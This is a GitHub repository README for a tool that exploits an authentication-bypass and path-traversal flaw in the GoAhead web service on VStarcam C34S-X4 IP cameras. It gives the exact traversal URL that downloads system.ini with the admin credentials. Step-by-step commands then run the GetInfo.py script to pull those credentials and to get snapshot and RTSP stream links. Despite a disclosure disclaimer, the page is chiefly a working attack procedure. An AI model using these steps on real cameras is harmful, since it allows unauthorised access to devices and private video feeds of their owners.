Skip to content

The Vulnerability of GoAhead Service on VStarcam C34S-X4 that allows you to download system.ini configuration file and get login and password.

License

Notifications You must be signed in to change notification settings

Retr0-code/auth-traversal

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

25 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Authentication Traversal

The Vulnerability of GoAhead Service on VStarcam C34S-X4 that allows you to download system.ini configuration file and get login and password.

!WARNING!

The author is trying to draw the attention of the developers to the problem and I am not responsible for the harm caused to you or by you.

IMPLEMENTATION

Еo perform the vulnerability, you must log in to the camera interface without authorization. Then, after the forward slash, you must add %5C%5Csystem.ini and the file will start downloading. When you open the file, you will see your username and password written together. I have already written a small program that interacts with the ONVIF protocol and receives images from the camera and a link to the RTSP stream.

STEPS

  1. To use it you have to install python3 onvif_zeep and requests
git clone https://github.com/Retr0-code/auth-treversal
pip3 install -r requirements.txt
chmod +x GetInfo.py
python3 GetInfo.py --help

2) You can go to you browser and enter this link http://ip:port/%5C%5Csystem.ini (You must change ip to address of camera and port to port that web-server run on).

MozilaV.png


Or you can use
python3 GetInfo.py --host <camera ip> --port <web-server port>

and than read as text downloaded file.

PythonLogPass.png


3) Now you can log in to web-panel.

webPanel.png

Or you can use

python3 GetInfo.py --onvif 10080 --host 192.168.0.58 --port 8888

and you get links to snapshots and RTSP stream link. To get stream you have to specify login and password like this: rtsp://username:password@ip:port/path/to/stream In my case link looks like this rtsp://admin:[email protected]:554/udp/av0_1

OnvifShow.png

About

The Vulnerability of GoAhead Service on VStarcam C34S-X4 that allows you to download system.ini configuration file and get login and password.

Topics

Resources

License

Stars

Watchers

Forks

Languages